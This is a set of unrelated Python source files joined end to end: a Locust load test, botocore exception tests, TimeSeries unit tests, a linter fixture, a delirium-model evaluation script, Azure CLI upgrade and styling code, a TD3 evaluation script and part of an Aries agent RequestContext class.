HTTP server directly.
1. Load index.html, etc.
2. Concurrently load /config, /schema
3. Concurrently load /layout/obs, /annotations/var?annotation-name=<the index>
-- Does initial render --
4. Concurrently load all /annotations/obs and all /layouts/obs
-- Fully initialized --
"""
# Users hit all of the init routes as fast as they can, subject to the ordering constraints and network latency.
wait_time = between(0.01, 0.1)
def on_start(self):
self.dataset = self.parent.dataset
self.client.verify = False
self.api_less_client = HttpSession(
base_url=self.client.base_url.replace("api.", "").replace("cellxgene/", ""),
request_success=self.client.request_success,
request_failure=self.client.request_failure,
)
@task
def index(self):
self.api_less_client.get(f"{self.dataset}", stream=True)
@task
def loadConfigAndSchema(self):
self.client.get(f"{self.dataset}/{API_SUFFIX}/schema", stream=True, catch_response=True)
self.client.get(f"{self.dataset}/{API_SUFFIX}/config", stream=True, catch_response=True)
@task
def loadBootstrapData(self):
self.client.get(
f"{self.dataset}/{API_SUFFIX}/layout/obs", headers={"Accept": "application/octet-stream"}, stream=True
)
self.client.get(
f"{self.dataset}/{API_SUFFIX}/annotations/var?annotation-name={self.parent.var_index_name()}",
headers={"Accept": "application/octet-stream"},
catch_response=True,
)
@task
def loadObsAnnotationsAndLayouts(self):
obs_names = self.parent.obs_annotation_names()
for name in obs_names:
self.client.get(
f"{self.dataset}/{API_SUFFIX}/annotations/obs?annotation-name={name}",
headers={"Accept": "application/octet-stream"},
stream=True,
)
layouts = self.parent.layout_names()
for name in layouts:
self.client.get(
f"{self.dataset}/{API_SUFFIX}/annotations/obs?layout-name={name}",
headers={"Accept": "application/octet-stream"},
stream=True,
)
@task
def done(self):
self.interrupt()
@task(1)
def load_expression(self):
"""
Simulate user occasionally loading some expression data for a gene
"""
gene_name = random.choice(self.gene_names)
filter = {"filter": {"var": {"annotation_value": [{"name": self.var_index_name(), "values": [gene_name]}]}}}
self.client.put(
f"{self.dataset}/{API_SUFFIX}/data/var",
data=json.dumps(filter),
headers={"Content-Type": "application/json", "Accept": "application/octet-stream"},
stream=True,
).close()
class CellxgeneUser(HttpUser):
tasks = [CellXGeneTasks]
# Most ops do not require back-end interaction, so slow cadence for users
wait_time = between(10, 60)
|
#!/usr/bin/python
# -------------------------------------
# Description:
# Arguments:
# Author: Victor Marot (University of Bristol)
# -------------------------------------
import os
import traceback
import sys
import pandas as pd
import numpy as np
import re
import argparse
import tkinter
|
# Copyright 2012-2020 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
from contextlib import contextmanager
from tests import unittest, BaseSessionTest, ClientHTTPStubber
class TestModeledExceptions(BaseSessionTest):
def setUp(self):
super(TestModeledExceptions, self).setUp()
self.region = "us-east-1"
def _create_client(self, service):
client = self.session.create_client(service, self.region)
http_stubber = ClientHTTPStubber(client)
return client, http_stubber
def test_query_service(self):
body = (
b'<ErrorResponse xmlns="http://ses.amazonaws.com/doc/2010-12-01/">'
b'<Error><Type>Sender</Type>'
b'<Name>foobar</Name>'
b'<Code>AlreadyExists</Code>'
b'<Message>Template already exists</Message>'
b'</Error></ErrorResponse>'
)
response = {
'Error': {
# NOTE: The name and type are also present here as we return
# the entire Error node as the 'Error' field for query
'Name': 'foobar',
'Type': 'Sender',
'Code': 'AlreadyExists',
'Message': 'Template already exists',
},
'ResponseMetadata': {
'HTTPStatusCode': 400,
'HTTPHeaders': {},
'RetryAttempts': 0,
},
# Modeled properties on the exception shape
'Name': 'foobar',
}
ses, http_stubber = self._create_client('ses')
exception_cls = ses.exceptions.AlreadyExistsException
with http_stubber as stubber:
stubber.add_response(status=400, headers={}, body=body)
with self.assertRaises(exception_cls) as assertion_context:
template = {
'TemplateName': 'foobar',
'SubjectPart': 'foo',
'TextPart': 'bar'
}
ses.create_template(Template=template)
self.assertEqual(assertion_context.exception.response, response)
def test_rest_xml_service(self):
body = (
b'<?xml version="1.0"?>\n'
b'<ErrorResponse xmlns="http://cloudfront.amazonaws.com/doc/2019-03-26/">'
b'<Error><Type>Sender</Type><Code>NoSuchDistribution</Code>'
b'<Message>The specified distribution does not exist.</Message>'
b'</Error>'
b'<RequestId>request-id</RequestId>'
b'</ErrorResponse>'
)
response = {
'Error': {
'Type': 'Sender',
'Code': 'NoSuchDistribution',
'Message': 'The specified distribution does not exist.',
},
'ResponseMetadata': {
'HTTPStatusCode': 404,
'HTTPHeaders': {},
'RequestId': 'request-id',
'RetryAttempts': 0,
},
# Modeled properties on the exception shape
'Message': 'The specified distribution does not exist.',
}
cloudfront, http_stubber = self._create_client('cloudfront')
exception_cls = cloudfront.exceptions.NoSuchDistribution
with http_stubber as stubber:
stubber.add_response(status=404, headers={}, body=body)
with self.assertRaises(exception_cls) as assertion_context:
cloudfront.get_distribution(Id='foobar')
self.assertEqual(assertion_context.exception.response, response)
def test_rest_json_service(self):
headers = {
'x-amzn-RequestId': 'request-id',
'x-amzn-ErrorType': 'FileSystemAlreadyExists:',
}
body = (
b'{"ErrorCode":"FileSystemAlreadyExists",'
b'"FileSystemId":"fs-abcabc12",'
b'"Message":"File system already exists"}'
)
response = {
'Error': {
'Code': 'FileSystemAlreadyExists',
'Message': 'File system already exists',
},
'ResponseMetadata': {
'HTTPStatusCode': 409,
'HTTPHeaders': {
'x-amzn-requestid': 'request-id',
'x-amzn-errortype': 'FileSystemAlreadyExists:',
},
'RequestId': 'request-id',
'RetryAttempts': 0,
},
# Modeled properties on the exception shape
'ErrorCode': 'FileSystemAlreadyExists',
'FileSystemId': 'fs-abcabc12',
'Message': 'File system already exists',
}
efs, http_stubber = self._create_client('efs')
exception_cls = efs.exceptions.FileSystemAlreadyExists
with http_stubber as stubber:
stubber.add_response(status=409, headers=headers, body=body)
with self.assertRaises(exception_cls) as assertion_context:
efs.create_file_system()
self.assertEqual(assertion_context.exception.response, response)
def test_json_service(self):
headers = {
'x-amzn-RequestId': 'request-id',
'x-amzn-id-2': 'id-2',
}
body = (
b'{"__type":"ResourceNotFoundException",'
b'"message":"Stream not found"}'
)
response = {
'Error': {
'Code': 'ResourceNotFoundException',
'Message': 'Stream not found',
},
'ResponseMetadata': {
'HTTPStatusCode': 400,
'HTTPHeaders': {
'x-amzn-requestid': 'request-id',
'x-amzn-id-2': 'id-2',
},
'RequestId': 'request-id',
'RetryAttempts': 0,
},
# Modeled properties on the exception shape
'message': 'Stream not found',
}
kinesis, http_stubber = self._create_client('kinesis')
exception_cls = kinesis.exceptions.ResourceNotFoundException
with http_stubber as stubber:
stubber.add_response(status=400, headers=headers, body=body)
with self.assertRaises(exception_cls) as assertion_context:
kinesis.describe_stream(StreamName='foobar')
self.assertEqual(assertion_context.exception.response, response)
|
import unittest
from timeseries.timeseries import TimeSeries
class MyTest(unittest.TestCase):
def test_median(self):
self.assertEqual(TimeSeries([1,2,3],[2,2,2]).median(),2)
self.assertEqual(TimeSeries([1,2,3],[0,2,0]).median(),0)
self.assertEqual(TimeSeries([1,2,3,4],[0,2,2,0]).median(),1)
with self.assertRaises(ValueError):
TimeSeries([],[]).median()
def test_mean(self):
self.assertEqual(TimeSeries([1,2,3],[2,2,2]).mean(),2)
self.assertEqual(TimeSeries([1,2,3],[0,2,0]).mean(),2/3)
self.assertEqual(TimeSeries([1,2,3,4],[0,2,2,0]).mean(),1)
with self.assertRaises(ValueError):
TimeSeries([],[]).mean()
def test_iters(self):
ts = TimeSeries([1,2,3],[4,5,6])
times = ts.times()
count = 0
for item in ts:
self.assertEqual(item, ts[times[count]])
count += 1
self.assertEqual(count, len(ts))
count = 0
for item in ts.itervalues():
self.assertEqual(item, ts[times[count]])
count += 1
self.assertEqual(count, len(ts))
count = 0
for item in ts.itertimes():
self.assertEqual(item, times[count])
count += 1
self.assertEqual(count, len(ts))
count = 0
for item in ts.iteritems():
self.assertEqual(item, (times[count], ts[times[count]]))
count += 1
self.assertEqual(count, len(ts))
def test_pos(self):
self.assertListEqual( list(TimeSeries([1,2,3],[-1,2,-4]).__pos__()) , [-1,2,-4] )
self.assertListEqual( list(TimeSeries([1,2,3],[1,2,4]).__pos__() ), [1,2,4] )
self.assertListEqual( list(TimeSeries([1,2,3],[-4,-6,-7]).__pos__() ), [-4,-6,-7] )
with self.assertRaises(ValueError):
TimeSeries([],[]).__pos__()
def test_neg(self):
self.assertListEqual( list( TimeSeries([1,2,3],[-1,2,-4]).__neg__() ), [1,-2,4] )
self.assertListEqual( list( TimeSeries([1,2,3],[1,2,4]).__neg__() ), [-1,-2,-4] )
self.assertListEqual( list( TimeSeries([1,2,3],[-4,-6,-7]).__neg__() ), [4,6,7] )
with self.assertRaises(ValueError):
TimeSeries([],[]).__neg__()
# def test_abs(self):
# self.assertEqual( TimeSeries([1,2,3],[-1,2,-4]).__abs__, [1,2,4] )
# self.assertEqual( TimeSeries([1,2,3],[1,2,4]).__abs__, [1,2,4] )
# self.assertEqual( TimeSeries([1,2,3],[-4,-6,-7]).__abs__, [4,6,7] )
# with self.assertRaises(ValueError):
# TimeSeries([],[]).__abs__
# def test_bool(self):
# self.assertEqual( TimeSeries([1,2,3],[-1,2,-4]).__neg__, True )
# self.assertEqual( TimeSeries([1,2,3],[1,2,4]).__neg__, True )
# self.assertEqual( TimeSeries([1,2,3],[-4,-6,-7]).__neg__, True )
suite = unittest.TestLoader().loadTestsFromTestCase(MyTest)
unittest.TextTestRunner().run(suite)
|
# this is a file full of problems
# but ignored with:
# checker_ignore_this_file
import os
def doit():
foo = bar
def with_tab():
print "there's a tab"
|
import numpy as np
import pickle
import random
import tensorflow as tf
from sklearn.metrics import auc, precision_recall_curve, roc_curve
import matplotlib.pyplot as plt
# ------------------------------------------------------ loading libraries ----
#opt = 'sites'
opt = 'years'
# --- setting random seed -----------------------------------------------------
seed_n = 42
np.random.seed(seed_n)
random.seed(seed_n)
tf.random.set_seed(seed_n)
# loading model
model = tf.keras.models.load_model('/project/M-ABeICU176709/delirium/data/revision/outputs/models/model_'+opt+'.hdf5')
# loading data
X_adm = pickle.load(open('/project/M-ABeICU176709/delirium/data/revision/preprocessed/X_adm5y_test_'+opt+'.pickle', 'rb'))
X_temp = pickle.load(open('/project/M-ABeICU176709/delirium/data/revision/preprocessed/X_temp_test_'+opt+'.pickle', 'rb'))
y_12h = pickle.load(open('/project/M-ABeICU176709/delirium/data/revision/preprocessed/y_12h_test_'+opt+'.pickle', 'rb'))
y_24h = pickle.load(open('/project/M-ABeICU176709/delirium/data/revision/preprocessed/y_24h_test_'+opt+'.pickle', 'rb'))
# -----------------------------------------------------------------------------
P_12h = y_12h.sum()
N_12h = len(y_12h) - P_12h
P_24h = y_24h.sum()
N_24h = len(y_24h) - P_24h
# Predicting y_12h and y_24h
results = model.predict([X_adm, X_temp],
verbose = 1)
y_12h_pred = results[0]
y_24h_pred = results[1]
# Applying calibrators (isotonic regression)
# 12h
y_12h_pred = [x[0] for x in y_12h_pred]
ir_12h = pickle.load(open('/project/M-ABeICU176709/delirium/data/revision/calibration/calibrators/ir_12h_'+opt+'.pickle', 'rb'))
y_12h_pred = ir_12h.transform(y_12h_pred)
# 24h
y_24h_pred = [x[0] for x in y_24h_pred]
ir_24h = pickle.load(open('/project/M-ABeICU176709/delirium/data/revision/calibration/calibrators/ir_24h_'+opt+'.pickle', 'rb'))
y_24h_pred = ir_24h.transform(y_24h_pred)
fpr_12h, tpr_12h, thresholds_roc_12h = roc_curve(y_12h, y_12h_pred)
fpr_24h, tpr_24h, thresholds_roc_24h = roc_curve(y_24h, y_24h_pred)
precision_12h, recall_12h, thresholds_pr_12h = precision_recall_curve(y_12h, y_12h_pred)
precision_24h, recall_24h, thresholds_pr_24h = precision_recall_curve(y_24h, y_24h_pred)
# roc 12h
plt.figure()
plt.plot([0, 1], [0, 1], 'k--')
plt.plot(fpr_12h, tpr_12h)
plt.xlabel('1 - Specificity')
plt.ylabel('Sensitivity')
plt.savefig(f'/project/M-ABeICU176709/delirium/data/revision/outputs/test/roc_12h_{opt}.png', dpi = 300)
# roc 24h
plt.figure()
plt.plot([0, 1], [0, 1], 'k--')
plt.plot(fpr_24h, tpr_24h)
plt.xlabel('1 - Specificity')
plt.ylabel('Sensitivity')
plt.savefig(f'/project/M-ABeICU176709/delirium/data/revision/outputs/test/roc_24h_{opt}.png', dpi = 300)
# prc 12h
plt.figure()
plt.plot(precision_12h, recall_12h)
plt.xlabel('Precision')
plt.ylabel('Recall / Sensitivity')
plt.savefig(f'/project/M-ABeICU176709/delirium/data/revision/outputs/test/prc_12h_{opt}.png', dpi = 300)
# prc 24h
plt.figure()
plt.plot(precision_24h, recall_24h)
plt.xlabel('Precision')
plt.ylabel('Recall / Sensitivity')
plt.savefig(f'/project/M-ABeICU176709/delirium/data/revision/outputs/test/prc_24h_{opt}.png', dpi = 300)
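# Illustrative summary (not part of the original script): area under each
# ROC curve, computed from the arrays above with sklearn.metrics.auc.
print('AUROC 12h:', auc(fpr_12h, tpr_12h))
print('AUROC 24h:', auc(fpr_24h, tpr_24h))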
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import os
from knack.log import get_logger
from knack.util import CLIError
logger = get_logger(__name__)
UPGRADE_MSG = 'Not able to upgrade automatically. Instructions can be found at https://aka.ms/doc/InstallAzureCli'
def rest_call(cmd, url, method=None, headers=None, uri_parameters=None,
body=None, skip_authorization_header=False, resource=None, output_file=None):
from azure.cli.core.util import send_raw_request
r = send_raw_request(cmd.cli_ctx, method, url, headers, uri_parameters, body,
skip_authorization_header, resource, output_file)
if not output_file and r.content:
try:
return r.json()
except ValueError:
            logger.warning('Not a JSON response, outputting to stdout. For binary data, '
                           'consider using "--output-file" to write to a file.')
print(r.text)
return None
def show_version(cmd): # pylint: disable=unused-argument
from azure.cli.core.util import get_az_version_json
versions = get_az_version_json()
return versions
def upgrade_version(cmd, update_all=None, yes=None): # pylint: disable=too-many-locals, too-many-statements, too-many-branches, no-member, unused-argument
import platform
import sys
import subprocess
import azure.cli.core.telemetry as telemetry
from azure.cli.core import __version__ as local_version
from azure.cli.core._environment import _ENV_AZ_INSTALLER
from azure.cli.core.extension import get_extensions, WheelExtension
from packaging.version import parse
update_cli = True
from azure.cli.core.util import get_latest_from_github
try:
latest_version = get_latest_from_github()
if latest_version and parse(latest_version) <= parse(local_version):
logger.warning("You already have the latest azure-cli version: %s", local_version)
update_cli = False
if not update_all:
return
except Exception as ex: # pylint: disable=broad-except
logger.debug("Failed to get the latest version. %s", str(ex))
exts = [ext.name for ext in get_extensions(ext_type=WheelExtension)] if update_all else []
exit_code = 0
installer = os.getenv(_ENV_AZ_INSTALLER) or ''
installer = installer.upper()
if update_cli:
latest_version_msg = 'It will be updated to {}.'.format(latest_version) if yes \
else 'Latest version available is {}.'.format(latest_version)
logger.warning("Your current Azure CLI version is %s. %s", local_version, latest_version_msg)
from knack.prompting import prompt_y_n, NoTTYException
if not yes:
logger.warning("Please check the release notes first: https://docs.microsoft.com/"
"cli/azure/release-notes-azure-cli")
try:
confirmation = prompt_y_n("Do you want to continue?", default='y')
except NoTTYException:
from azure.cli.core.azclierror import UnclassifiedUserFault
raise UnclassifiedUserFault("No tty available.", "Please run command with --yes.")
if not confirmation:
telemetry.set_success("Upgrade stopped by user")
return
if installer == 'DEB':
from azure.cli.core.util import in_cloud_console
if in_cloud_console():
raise CLIError("az upgrade is not supported in Cloud Shell.")
apt_update_cmd = 'apt-get update'.split()
az_update_cmd = 'apt-get install --only-upgrade -y azure-cli'.split()
if os.geteuid() != 0: # pylint: disable=no-member
apt_update_cmd.insert(0, 'sudo')
az_update_cmd.insert(0, 'sudo')
exit_code = subprocess.call(apt_update_cmd)
if exit_code == 0:
logger.debug("Update azure cli with '%s'", " ".join(az_update_cmd))
exit_code = subprocess.call(az_update_cmd)
elif installer == 'RPM':
from azure.cli.core.util import get_linux_distro
distname, _ = get_linux_distro()
if not distname:
logger.warning(UPGRADE_MSG)
else:
distname = distname.lower().strip()
if any(x in distname for x in ['centos', 'rhel', 'red hat', 'fedora']):
update_cmd = 'yum update -y azure-cli'.split()
if os.geteuid() != 0: # pylint: disable=no-member
update_cmd.insert(0, 'sudo')
logger.debug("Update azure cli with '%s'", " ".join(update_cmd))
exit_code = subprocess.call(update_cmd)
elif any(x in distname for x in ['opensuse', 'suse', 'sles']):
zypper_refresh_cmd = ['zypper', 'refresh']
az_update_cmd = 'zypper update -y azure-cli'.split()
if os.geteuid() != 0: # pylint: disable=no-member
zypper_refresh_cmd.insert(0, 'sudo')
az_update_cmd.insert(0, 'sudo')
exit_code = subprocess.call(zypper_refresh_cmd)
if exit_code == 0:
logger.debug("Update azure cli with '%s'", " ".join(az_update_cmd))
exit_code = subprocess.call(az_update_cmd)
else:
logger.warning(UPGRADE_MSG)
elif installer == 'HOMEBREW':
logger.debug("Update homebrew formulae")
exit_code = subprocess.call(['brew', 'update'])
if exit_code == 0:
update_cmd = ['brew', 'upgrade', 'azure-cli']
logger.debug("Update azure cli with '%s'", " ".join(update_cmd))
exit_code = subprocess.call(update_cmd)
elif installer == 'PIP':
pip_args = [sys.executable, '-m', 'pip', 'install', '--upgrade', 'azure-cli', '-vv',
'--disable-pip-version-check', '--no-cache-dir']
logger.debug("Update azure cli with '%s'", " ".join(pip_args))
exit_code = subprocess.call(pip_args, shell=platform.system() == 'Windows')
elif installer == 'DOCKER':
logger.warning("Exit the container to pull latest image with 'docker pull mcr.microsoft.com/azure-cli' "
"or run 'pip install --upgrade azure-cli' in this container")
elif installer == 'MSI':
exit_code = _upgrade_on_windows()
else:
logger.warning(UPGRADE_MSG)
if exit_code:
err_msg = "CLI upgrade failed."
logger.warning(err_msg)
telemetry.set_failure(err_msg)
sys.exit(exit_code)
# Avoid using python modules directly as they may have been changed due to upgrade.
# If you do need to use them, you may need to reload them and their dependent modules.
# Otherwise you may have such issue https://github.com/Azure/azure-cli/issues/16952
import importlib
import json
importlib.reload(subprocess)
importlib.reload(json)
version_result = subprocess.check_output(['az', 'version', '-o', 'json'], shell=platform.system() == 'Windows')
version_json = json.loads(version_result)
new_version = version_json['azure-cli-core']
if update_cli and new_version == local_version:
err_msg = "CLI upgrade failed or aborted."
logger.warning(err_msg)
telemetry.set_failure(err_msg)
sys.exit(1)
if exts:
logger.warning("Upgrading extensions")
for ext_name in exts:
try:
logger.warning("Checking update for %s", ext_name)
subprocess.call(['az', 'extension', 'update', '-n', ext_name],
shell=platform.system() == 'Windows')
except Exception as ex: # pylint: disable=broad-except
msg = "Extension {} update failed during az upgrade. {}".format(ext_name, str(ex))
raise CLIError(msg)
auto_upgrade_msg = "You can enable auto-upgrade with 'az config set auto-upgrade.enable=yes'. " \
"More details in https://docs.microsoft.com/cli/azure/update-azure-cli#automatic-update"
logger.warning("Upgrade finished.%s", "" if cmd.cli_ctx.config.getboolean('auto-upgrade', 'enable', False)
else auto_upgrade_msg)
def _upgrade_on_windows():
"""Download MSI to a temp folder and install it with msiexec.exe.
Directly installing from URL may be blocked by policy: https://github.com/Azure/azure-cli/issues/19171
This also gives the user a chance to manually install the MSI in case of msiexec.exe failure.
"""
logger.warning("Updating Azure CLI with MSI from https://aka.ms/installazurecliwindows")
tmp_dir, msi_path = _download_from_url('https://aka.ms/installazurecliwindows')
logger.warning("Installing MSI")
import subprocess
exit_code = subprocess.call(['msiexec.exe', '/i', msi_path])
if exit_code:
logger.warning("Installation Failed. You may manually install %s", msi_path)
else:
from azure.cli.core.util import rmtree_with_retry
logger.warning("Succeeded. Deleting %s", tmp_dir)
rmtree_with_retry(tmp_dir)
return exit_code
def _download_from_url(url):
import requests
from azure.cli.core.util import should_disable_connection_verify
r = requests.get(url, stream=True, verify=(not should_disable_connection_verify()))
if r.status_code != 200:
raise CLIError("Request to {} failed with {}".format(url, r.status_code))
    # r.url is the real path of the MSI, like 'https://azcliprod.blob.core.windows.net/msi/azure-cli-2.27.1.msi'
file_name = r.url.rsplit('/')[-1]
import tempfile
tmp_dir = tempfile.mkdtemp()
msi_path = os.path.join(tmp_dir, file_name)
logger.warning("Downloading MSI to %s", msi_path)
with open(msi_path, 'wb') as f:
for chunk in r.iter_content(chunk_size=1024):
f.write(chunk)
# Return both the temp directory and MSI path, like
# 'C:\Users\<name>\AppData\Local\Temp\tmpzv4pelsf',
# 'C:\Users\<name>\AppData\Local\Temp\tmpzv4pelsf\azure-cli-2.27.1.msi'
return tmp_dir, msi_path
def demo_style(cmd, theme=None): # pylint: disable=unused-argument
from azure.cli.core.style import Style, print_styled_text, format_styled_text
if theme:
format_styled_text.theme = theme
print_styled_text("[How to call print_styled_text]")
# Print an empty line
print_styled_text()
# Various methods to print
print_styled_text("- Print using a str")
print_styled_text("- Print using multiple", "strs")
print_styled_text((Style.PRIMARY, "- Print using a tuple"))
print_styled_text((Style.PRIMARY, "- Print using multiple"), (Style.IMPORTANT, "tuples"))
print_styled_text([(Style.PRIMARY, "- Print using a "), (Style.IMPORTANT, "list")])
print_styled_text([(Style.PRIMARY, "- Print using multiple")], [(Style.IMPORTANT, "lists")])
print_styled_text()
print_styled_text("[Available styles]\n")
placeholder = '████ {:8s}: {}\n'
styled_text = [
(Style.PRIMARY, placeholder.format("White", "Primary text color")),
(Style.SECONDARY, placeholder.format("Grey", "Secondary text color")),
(Style.IMPORTANT, placeholder.format("Magenta", "Important text color")),
(Style.ACTION, placeholder.format(
"Blue", "Commands, parameters, and system inputs (White in legacy powershell terminal)")),
(Style.HYPERLINK, placeholder.format("Cyan", "Hyperlink")),
(Style.ERROR, placeholder.format("Red", "Error message indicator")),
(Style.SUCCESS, placeholder.format("Green", "Success message indicator")),
(Style.WARNING, placeholder.format("Yellow", "Warning message indicator")),
]
print_styled_text(styled_text)
print_styled_text("[interactive]\n")
    # NOTE: Unicode characters ⦾ and ⦿ may not be displayed correctly in some terminals
styled_text = [
(Style.ACTION, "?"),
(Style.PRIMARY, " Select a SKU for your app:\n"),
(Style.PRIMARY, "⦾ Free "),
(Style.SECONDARY, "Dev/Test workloads: 1 GB memory, 60 minutes/day compute\n"),
(Style.PRIMARY, "⦾ Basic "),
(Style.SECONDARY, "Dev/Test workloads: 1.75 GB memory, monthly charges apply\n"),
(Style.PRIMARY, "⦾ Standard "),
(Style.SECONDARY, "Production workloads: 1.75 GB memory, monthly charges apply\n"),
(Style.ACTION, "⦿ Premium "),
(Style.SECONDARY, "Production workloads: 3.5 GB memory, monthly charges apply\n"),
]
print_styled_text(styled_text)
print_styled_text("[progress report]\n")
    # NOTE: The Unicode character ✓ may not be displayed correctly in some terminals
styled_text = [
(Style.SUCCESS, '(✓) Done: '),
(Style.PRIMARY, "Creating a resource group for myfancyapp\n"),
(Style.SUCCESS, '(✓) Done: '),
(Style.PRIMARY, "Creating an App Service Plan for myfancyappplan on a "),
(Style.IMPORTANT, "premium instance"),
(Style.PRIMARY, " that has a "),
(Style.IMPORTANT, "monthly charge"),
(Style.PRIMARY, "\n"),
(Style.SUCCESS, '(✓) Done: '),
(Style.PRIMARY, "Creating a webapp named myfancyapp\n"),
]
print_styled_text(styled_text)
    print_styled_text("[error handling]\n")
styled_text = [
(Style.ERROR, "ERROR: Command not found: az storage create\n"),
(Style.PRIMARY, "TRY\n"),
(Style.ACTION, "az storage account create --name"),
(Style.PRIMARY, " mystorageaccount "),
(Style.ACTION, "--resource-group"),
(Style.PRIMARY, " MyResourceGroup\n"),
(Style.SECONDARY, "Create a storage account. For more detail, see "),
(Style.HYPERLINK, "https://docs.microsoft.com/azure/storage/common/storage-account-create?"
"tabs=azure-cli#create-a-storage-account-1"),
(Style.SECONDARY, "\n"),
]
print_styled_text(styled_text)
print_styled_text("[post-output hint]\n")
styled_text = [
(Style.PRIMARY, "The default subscription is "),
(Style.IMPORTANT, "AzureSDKTest (0b1f6471-1bf0-4dda-aec3-cb9272f09590)"),
(Style.PRIMARY, ". To switch to another subscription, run "),
(Style.ACTION, "az account set --subscription"),
(Style.PRIMARY, " <subscription ID>\n"),
(Style.WARNING, "WARNING: The subscription has been disabled!\n")
]
print_styled_text(styled_text)
print_styled_text("[logs]\n")
# Print logs
    logger.debug("This is a debug log entry.")
    logger.info("This is an info log entry.")
    logger.warning("This is a warning log entry.")
    logger.error("This is an error log entry.")
    logger.critical("This is a critical log entry.")
|
import argparse
import gym
import torch
from pbrl.algorithms.td3 import TD3, Policy, Runner
from pbrl.env import DummyVecEnv
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--env', type=str, default='HalfCheetah-v3')
parser.add_argument('--filename', type=str, required=True)
parser.add_argument('--subproc', action='store_true')
parser.add_argument('--seed', type=int, default=0)
parser.add_argument('--rnn', type=str, default=None)
parser.add_argument('--obs_norm', action='store_true')
parser.add_argument('--env_num_test', type=int, default=1)
parser.add_argument('--episode_num_test', type=int, default=1)
parser.add_argument('--render', type=float, default=0.005)
args = parser.parse_args()
torch.manual_seed(args.seed)
# define test environment
env_test = DummyVecEnv([lambda: gym.make(args.env) for _ in range(args.env_num_test)])
env_test.seed(args.seed)
# define policy
policy = Policy(
observation_space=env_test.observation_space,
action_space=env_test.action_space,
rnn=args.rnn,
hidden_sizes=[256, 256],
activation=torch.nn.ReLU,
obs_norm=args.obs_norm,
critic=False,
device=torch.device('cuda:0') if torch.cuda.is_available() else torch.device('cpu')
)
# load policy from disk
TD3.load(args.filename, policy)
# define test runner
runner_test = Runner(env=env_test, render=args.render)
runner_test.reset()
while True:
try:
test_info = runner_test.run(policy, episode_num=args.episode_num_test)
print(test_info)
except KeyboardInterrupt:
break
if __name__ == '__main__':
main()
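# Example invocation (illustrative; both the script name and the checkpoint
# path are hypothetical and depend on where TD3.save() wrote the policy):
#   python eval_td3.py --env HalfCheetah-v3 --filename result/HalfCheetah-v3/policy.pkl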
|
"""
Request context class.
A request context provides everything required by handlers and other parts
of the system to process a message.
"""
from typing import Mapping, Optional, Type
from ..core.profile import Profile, ProfileSession
from ..config.injector import Injector, InjectType
from ..config.injection_context import InjectionContext
from ..config.settings import Settings
from ..connections.models.conn_record import ConnRecord
from ..transport.inbound.receipt import MessageReceipt
from ..utils.classloader import DeferLoad
from .agent_message import AgentMessage
IN_MEM = DeferLoad("aries_cloudagent.core.in_memory.InMemoryProfile")
class RequestContext:
"""Context established by the Conductor and passed into message handlers."""
def __init__(
self,
profile: Profile,
*,
context: InjectionContext = None,
settings: Mapping[str, object] = None
):
"""Initialize an instance of RequestContext."""
self._connection_ready = False
self._connection_record = None
self._context = (context or profile.context).start_scope("request", settings)
self._message = None
self._message_receipt = None
self._profile = profile
@property
def connection_ready(self) -> bool:
"""
Accessor for the flag indicating an active connection with the sender.
Returns:
True if the connection is active, else False
"""
return self._connection_ready
@connection_ready.setter
def connection_ready(self, active: bool):
"""
Setter for the flag indicating an active connection with the sender.
Args:
active: The new active value
"""
self._connection_ready = active
@property
def connection_record(self) -> ConnRecord:
"""Accessor for the related connection record."""
return self._connection_record
@connection_record.setter
def connection_record(self, record: ConnRecord):
"""Setter for the related connection record.
:param record: ConnRecord:
"""
self._connection_record = record
@property
def default_endpoint(self) -> str:
"""
Accessor for the default agent endpoint (from agent config).
Returns:
The default agent endpoint
"""
return self._context.settings.get("default_endpoint")
@default_endpoint.setter
def default_endpoint(self, endpoint: str):
"""
Setter for the default agent endpoint (from agent config).
Args:
endpoint: The new default endpoint
"""
self._context.settings["default_endpoint"] = endpoint
@property
def default_label(self) -> str:
"""
Accessor for the default agent label (from agent config).
Returns:
The default label
"""
return self._context.settings["default_label"]
@default_label.setter
def default_label(self, label: str):
"""
Setter for the default agent label (from agent config).
Args:
label: The new default label
"""
self._context.settings["default_label"] = label
@property
def message(self) -> AgentMessage:
"""
Accessor for the deserialized message instance.
Returns:
This context's agent message
"""
return self._message
@message.setter
def message(self, msg: AgentMessage):
"""
Setter for the deserialized message instance.
Args:
msg: This context's new agent message
"""
self._message = msg
@property
def message_receipt(self) -> MessageReceipt:
"""
Accessor for the message receipt information.
Returns:
This context's message receipt information
"""
return self._message_receipt
@message_receipt.setter
def message_receipt(self, receipt: MessageReceipt):
"""
Setter for the message receipt information.
Args:
            receipt: This context's new message receipt information
"""
self._message_receipt = receipt
@property
def injector(self) -> Injector:
"""Accessor for the associated `Injector` instance."""
return self._context.injector
@property
def profile(self) -> Profile:
"""Accessor for the associated `Profile` instance."""
return self._profile
@property
def settings(self) -> Settings:
"""Accessor for the context settings."""
return self._context.settings
def session(self) -> ProfileSession:
"""Start a new interactive session with no transaction support requested."""
return self.profile.session(self._context)
def transaction(self) -> ProfileSession:
"""
Start a new interactive session with commit and rollback support.
If the current backend does not support transactions, then commit
and rollback operations of the session will not have any effect.
"""
return self.profile.transaction(self._context)
def inject(
self,
base_cls: Type[InjectType],
settings: Mapping[str, object] = None,
) -> InjectType:
"""
Get the provided instance of a given class identifier.
Args:
            base_cls: The base class to retrieve an instance of
settings: An optional mapping providing configuration to the provider
Returns:
An instance of the base class, or None
"""
return self._context.inject(base_cls, settings)
def inject_or(
self,
base_cls: Type[InjectType],
settings: Mapping[str, object] = None,
default: Optional[InjectType] = None,
) -> Optional[InjectType]:
"""
Get the provided instance of a given class identifier or default if not found.
Args:
base_cls: The base class to retrieve an instance of
settings: An optional dict providing configuration to the provider
default: default return value if no instance is found
Returns:
An instance of the base class, or None
"""
return self._context.inject_or(base_cls, settings, default)
def update_settings(self, settings: Mapping[str, object]):
"""Update the scope with additional settings."""
self._context.update_settings(settings)
@classmethod
def test_context(cls) -> "RequestContext":
